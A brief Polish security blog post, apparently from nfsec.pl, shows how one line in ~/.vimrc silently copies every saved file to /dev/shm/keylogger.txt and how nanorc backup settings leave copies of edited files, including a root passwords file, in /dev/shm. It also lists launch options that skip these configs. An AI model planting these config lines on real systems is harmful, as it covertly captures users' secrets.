Zamieniamy vim w keylogger

nfsec.pl 1 rok temu

Jeśli dodamy poniższą linijkę do pliku ~/.vimrc lub ~/.vim/plugins:

:autocmd BufWritePost * :silent :w! >> /dev/shm/keylogger.txt

To wszystkie wpisane dane wpisane w edytorze wylądują w pliku /dev/shm/keylogger.txt. Dla osób stojących po drugiej stronie wojny edytorów – jeżeli do pliku ~/.nanorc lub /etc/nanorc wpisy:

set backup set backupdir /dev/shm set allow_insecure_backup

To kopie zapasowe edytowanych plików wylądują w katalogu /dev/shm/:

root@stardust:~# ls -al /dev/shm/ total 8 drwxrwxrwt 2 root root 80 Mar 6 20:17 . drwxr-xr-x 18 root root 4120 Feb 11 17:58 .. -rw-r----- 1 root root 31 Mar 6 20:09 keylogger.txt -rw-r----- 1 root root 22 Mar 6 20:09 '!root!passwords.txt~'

Jeśli pliki konfiguracyjne mają zostać pominięte przy uruchomieniu wystarczy uruchomić je z opcjami:

nano -R [plik] nim -u NONE [plik]

Więcej informacji: Alh4zr3d on Twitter

Idź do oryginalnego materiału